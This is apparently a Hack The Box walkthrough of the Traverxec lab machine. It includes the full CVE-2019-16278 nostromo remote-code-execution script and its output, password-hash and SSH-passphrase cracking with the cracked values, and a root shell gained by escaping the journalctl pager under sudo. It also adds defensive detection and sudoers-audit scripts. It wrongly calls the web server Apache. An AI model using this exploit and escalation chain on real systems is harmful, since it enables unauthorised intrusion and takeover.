TL;DR
- Find the web server version and exploit CVE-2019-16278 in Nostromo
- Crack user’s hash and use directory traversal to retrieve private key
- Abuse journalctl to get root
User.txt
Reconnaissance
Let’s start with an Nmap scan:
magnussen@funcMyLife:~/traverxec$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN traverxec.txt
Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-18 21:24 CET
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Initiating Ping Scan at 21:24
Scanning 10.10.10.165 [4 ports]
Completed Ping Scan at 21:24, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:24
Completed Parallel DNS resolution of 1 host. at 21:24, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:24
Scanning 10.10.10.165 [65535 ports]
Discovered open port 80/tcp on 10.10.10.165
Discovered open port 22/tcp on 10.10.10.165
Increasing send delay for 10.10.10.165 from 0 to 5 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 10.10.10.165 from 5 to 10 due to 11 out of 18 dropped probes since last increase.
Completed SYN Stealth Scan at 21:24, 39.50s elapsed (65535 total ports)
Initiating Service scan at 21:24
Scanning 2 services on 10.10.10.165
Completed Service scan at 21:24, 6.51s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.165.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 1.99s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Nmap scan report for 10.10.10.165
Host is up, received echo-reply ttl 63 (0.035s latency).
Scanned at 2020-02-18 21:24:00 CET for 49s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVWo6eEhBKO19Owd6sVIAFVCJjQqSL4g16oI/DoFwUo+ubJyyIeTRagQNE91YdCrENXF2qBs2yFj2fqfRZy9iqGB09VOZt6i8oalpbmFwkBDtCdHoIAZbaZFKAl+m1UBell2v0xUhAy37Wl9BjoUU3EQBVF5QJNQqvb/mSqHsi5TAJcMtCpWKA4So3pwZcTatSu5x/RYdKzzo9fWSS6hjO4/hdJ4BM6eyKQxa29vl/ea1PvcHPY5EDTRX5RtraV9HAT7w2zIZH5W6i3BQvMGEckrrvVTZ6Ge3Gjx00ORLBdoVyqQeXQzIJ/vuDuJOH2G6E/AHDsw3n5yFNMKeCvNNL
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLpsS/IDFr0gxOgk9GkAT0G4vhnRdtvoL8iem2q8yoRCatUIib1nkp5ViHvLEgL6e3AnzUJGFLI3TFz+CInilq4=
| 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGJ16OMR0bxc/4SAEl1yiyEUxC3i/dFH7ftnCU7+P+3s
80/tcp open http syn-ack ttl 63 nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.85 seconds
Raw packets sent: 196637 (8.652MB) | Rcvd: 22 (952B)
So we find 2 useful services:
- OpenSSH (22)
- Apache (80)
The website is a single page website about a developer.
If we generate an error, we find the webserver version.
magnussen@funcMyLife:~/traverxec$ curl traverxec.htb/test
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>404 Not Found</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
</head>
<body>
<h1>404 Not Found</h1>
<hr>
<address>nostromo 1.9.6 at traverxec.htb Port 80</address>
</body>
</html>
Nostromo RCE
We can check for known CVEs affecting Nostromo 1.9.6.
We find the following script on ExploitDB:
#!/usr/bin/env python
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278
# cve2019_16278.py
import sys
import socket
art = """
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
"""
help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection
    except:
        pass
    return response

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload)
    receive = connect(soc)
    print(receive)

if __name__ == "__main__":
    print(art)
    try:
        target = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]
        cve(target, port, cmd)
    except IndexError:
        print(help_menu)
Let’s try it:
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 id
HTTP/1.1 200 OK
Date: Tue, 18 Feb 2020 20:50:21 GMT
Server: nostromo 1.9.6
Connection: close
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We now have remote command execution on the machine as www-data.
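A literal search for /../ in the request line built by the script above finds nothing, because the dot pairs are separated by %0d. The following detector is an added example, not part of the original write-up or of nostromo: it normalizes the request target first and then checks whether the path leaves the document root. The function names and the sample request lines are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

CTRL = re.compile(r"[\x00-\x1f\x7f]")                  # raw control bytes
ENC_CTRL = re.compile(r"%(?:[01][0-9a-f]|7f)", re.I)   # %00-%1f and %7f

def normalize_path(target):
    """Reduce a request target to the path the filesystem would finally see."""
    path = target.split("?", 1)[0]
    for _ in range(3):                  # bounded, also catches double encoding
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path = decoded
    return CTRL.sub("", path).replace("\\", "/")

def escapes_docroot(target):
    """True if the normalized path climbs above the document root."""
    depth = 0
    for segment in normalize_path(target).split("/"):
        if segment in ("", "."):
            continue
        depth += -1 if segment == ".." else 1
        if depth < 0:
            return True
    return False

def flag_requests(request_lines):
    """Return (request line, reasons) for each suspicious request line."""
    hits = []
    for line in request_lines:
        target = (line.split(" ") + [""])[1]    # "METHOD target VERSION"
        reasons = [name for name, hit in (
            ("traversal", escapes_docroot(target)),
            ("encoded-control-char", bool(ENC_CTRL.search(target))),
        ) if hit]
        if reasons:
            hits.append((line, reasons))
    return hits

# Constructed sample; the second line has the shape of the script's request.
SAMPLE = [
    "GET /index.html HTTP/1.1",
    "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0",
    "GET /img/../index.html HTTP/1.1",
    "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1",
]

if __name__ == "__main__":
    print(*flag_requests(SAMPLE), sep="\n")
```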
Crack user password and RSA passphrase
Let’s go deeper:
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/"
drwxr-xr-x 12 root root 4.0K Oct 25 14:43 .
drwxr-xr-x 18 root root 4.0K Oct 25 14:17 ..
drwxr-xr-x 2 root root 4.0K Nov 12 06:25 backups
drwxr-xr-x 9 root root 4.0K Oct 25 14:34 cache
drwxr-xr-x 26 root root 4.0K Nov 12 04:56 lib
drwxrwsr-x 2 root staff 4.0K May 13 2019 local
lrwxrwxrwx 1 root root 9 Oct 25 14:15 lock -> /run/lock
drwxr-xr-x 5 root root 4.0K Feb 18 13:39 log
drwxrwsr-x 2 root mail 4.0K Oct 25 14:15 mail
drwxr-xr-x 6 root root 4.0K Oct 25 14:43 nostromo
drwxr-xr-x 2 root root 4.0K Oct 25 14:15 opt
lrwxrwxrwx 1 root root 4 Oct 25 14:15 run -> /run
drwxr-xr-x 4 root root 4.0K Oct 25 14:16 spool
drwxrwxrwt 3 root root 4.0K Feb 18 13:56 tmp
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/nostromo"
drwxr-xr-x 6 root root 4.0K Oct 25 14:43 .
drwxr-xr-x 12 root root 4.0K Oct 25 14:43 ..
drwxr-xr-x 2 root daemon 4.0K Oct 27 16:12 conf
drwxr-xr-x 6 root daemon 4.0K Oct 25 17:11 htdocs
drwxr-xr-x 2 root daemon 4.0K Oct 25 14:43 icons
drwxr-xr-x 2 www-data daemon 4.0K Feb 18 15:11 logs
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/nostromo/conf"
drwxr-xr-x 2 root daemon 4.0K Oct 27 16:12 .
drwxr-xr-x 6 root root 4.0K Oct 25 14:43 ..
-rw-r--r-- 1 root bin 41 Oct 25 15:20 .htpasswd
-rw-r--r-- 1 root bin 2.9K Oct 25 14:26 mimes
-rw-r--r-- 1 root bin 498 Oct 25 15:20 nhttpd.conf
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "cat /var/nostromo/conf/.htpasswd"
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "cat /var/nostromo/conf/nhttpd.conf"
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/"
total 12K
drwxr-xr-x 3 root root 4.0K Oct 25 14:32 .
drwxr-xr-x 18 root root 4.0K Oct 25 14:17 ..
drwx--x--x 6 david david 4.0K Feb 18 15:24 david
OK, so we found a hash. The $1$ prefix means md5crypt (hashcat mode 500), and we can crack it with hashcat:
magnussen@funcMyLife:~/traverxec$ hashcat -m 500 -a 0 --force 'david_hash.txt' 'rockyou.txt' --show
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
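As we saw in nhttpd.conf, homedirs is /home and homedirs_public is public_www. /home/david has mode drwx--x--x, so we can’t list its content, but the execute bit lets us traverse into a subdirectory whose name we already know, such as public_www, and list the files inside.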
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/david/public_www/"
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 .
drwx--x--x 6 david david 4.0K Feb 18 15:24 ..
-rw-r--r-- 1 david david 402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4.0K Oct 25 17:02 protected-file-area
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/david/public_www/protected-file-area"
drwxr-xr-x 2 david david 4.0K Oct 25 17:02 .
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 ..
-rw-r--r-- 1 david david 45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1.9K Oct 25 17:02 backup-ssh-identity-files.tgz
We can recover the archive with zcat:
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "zcat /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz"
home/david/.ssh/0000700000175000017500000000000013554661372012712 5ustar daviddavidhome/david/.ssh/authorized_keys0000644000175000017500000000061513554661372016062 0ustar daviddavidssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec
home/david/.ssh/id_rsa0000600000175000017500000000334613554661335014105 0ustar daviddavid
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
-----END RSA PRIVATE KEY-----
home/david/.ssh/id_rsa.pub0000644000175000017500000000061513554661364014700 0ustar daviddavidssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec
It’s time to crack the private key’s passphrase with JohnTheRipper!
magnussen@funcMyLife:~/traverxec$ ./JohnTheRipper/run/ssh2john.py david_private_key.txt > crack_david.txt
magnussen@funcMyLife:~/traverxec$ ./JohnTheRipper/run/john --wordlist=rockyou.txt crack_david.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (david_private_key.txt)
1g 0:00:00:03 DONE (2020-02-18 22:07) 0.2710g/s 3886Kp/s 3886Kc/s 3886KC/s ¡Vamos!
Session completed
We have everything we need to connect to the server with SSH.
magnussen@funcMyLife:~/traverxec$ ssh -i david_private_key.txt david@traverxec.htb
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
david@traverxec:~$ ls -alh
total 44K
drwx--x--x 6 david david 4.0K Feb 18 15:24 .
drwxr-xr-x 3 root root 4.0K Oct 25 14:32 ..
lrwxrwxrwx 1 root root 9 Oct 25 16:15 .bash_history -> /dev/null
-rw-r--r-- 1 david david 220 Oct 25 14:32 .bash_logout
-rw-r--r-- 1 david david 3.5K Oct 25 14:32 .bashrc
-rw------- 1 david david 130 Feb 18 15:19 .lesshst
drwxr-xr-x 3 david david 4.0K Feb 18 15:24 .local
-rw-r--r-- 1 david david 807 Oct 25 14:32 .profile
drwx------ 2 david david 4.0K Oct 25 17:02 .ssh
drwx------ 2 david david 4.0K Feb 18 15:08 bin
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 public_www
-r--r----- 1 root david 33 Oct 25 16:14 user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d
I AM ROOT
Journalctl abuse
Let’s see how we can get root. We start by looking in the bin directory:
david@traverxec:~/bin$ ls -alh
total 20K
-rw-r--r-- 1 david david 621 Feb 18 15:08 -pager
drwx------ 2 david david 4.0K Feb 18 15:08 .
drwx--x--x 6 david david 4.0K Feb 18 15:24 ..
-r-------- 1 david david 802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
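Alright, journalctl is run with sudo. In the script its output is piped to cat, but if we run the same command directly, journalctl hands its output to a pager (less by default), and from the pager we can run !/bin/sh and get a shell as root!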
david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2020-02-18 14:25:14 EST, end at Tue 2020-02-18 16:12:25 EST. --
Feb 18 16:00:54 traverxec sudo[18362]: pam_unix(sudo:auth): authentication failure; logname
Feb 18 16:00:56 traverxec sudo[18362]: pam_unix(sudo:auth): conversation failed
Feb 18 16:00:56 traverxec sudo[18362]: pam_unix(sudo:auth): auth could not identify passwor
Feb 18 16:00:56 traverxec sudo[18362]: www-data : command not allowed ; TTY=pts/15 ; PWD=/t
Feb 18 16:00:57 traverxec crontab[18424]: (www-data) LIST (www-data)
!/bin/sh
# /bin/bash
root@traverxec:/home/david# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:~# cat /root/root.txt
9aa36a6d76f785dfd320a478f6e0d906
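On the defensive side, a sudo rule for a command that pages its output can be audited for. The following checker is an added example, not part of the original write-up: it flags sudoers command specs that reach a pager without the NOEXEC tag or a pinned --no-pager argument. The sudoers lines in SAMPLE are constructed (the box's sudoers file is not shown on this page), and the parser is deliberately simplified.

```python
import os
import re

# Programs that page their output (or are pagers); illustrative, not exhaustive.
PAGER_CAPABLE = {"journalctl", "systemctl", "less", "more", "man"}
HAS_NO_PAGER_FLAG = {"journalctl", "systemctl"}

def audit_sudoers(text):
    """Return (lineno, command, advice) for command specs that can reach a pager.
    Simplified parser: no aliases, no line continuations, no Defaults handling."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")) or "=" not in line:
            continue
        spec = re.sub(r"^\s*\([^)]*\)", "", line.split("=", 1)[1])  # drop (runas)
        tags = set()                      # tags carry over to later commands
        for cmd in spec.split(","):
            cmd = cmd.strip()
            while (m := re.match(r"([A-Z_]+):\s*", cmd)):
                if m.group(1) == "EXEC":
                    tags.discard("NOEXEC")
                else:
                    tags.add(m.group(1))
                cmd = cmd[m.end():]
            argv = cmd.split()
            if not argv:
                continue
            name = os.path.basename(argv[0])
            if name not in PAGER_CAPABLE or "NOEXEC" in tags:
                continue
            if name in HAS_NO_PAGER_FLAG and "--no-pager" in argv:
                continue
            advice = "add the NOEXEC: tag"
            if name in HAS_NO_PAGER_FLAG:
                advice += " or pin --no-pager in the rule"
            findings.append((lineno, cmd, advice))
    return findings

# Constructed sudoers lines for illustration; not the box's actual sudoers file.
SAMPLE = """\
david ALL=(ALL:ALL) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
david ALL=(ALL:ALL) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
david ALL=(root) NOEXEC: NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
ops ALL=(root) /usr/bin/uptime, /usr/bin/less /var/log/syslog
"""

if __name__ == "__main__":
    print(*audit_sudoers(SAMPLE), sep="\n")
```

When a sudoers rule lists arguments, the invocation has to match them exactly, so a rule that pins --no-pager cannot be run without it. NOEXEC depends on the dynamic linker and does not cover statically linked binaries.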
This was a nice box, not very difficult, but a good way to start on Hack The Box.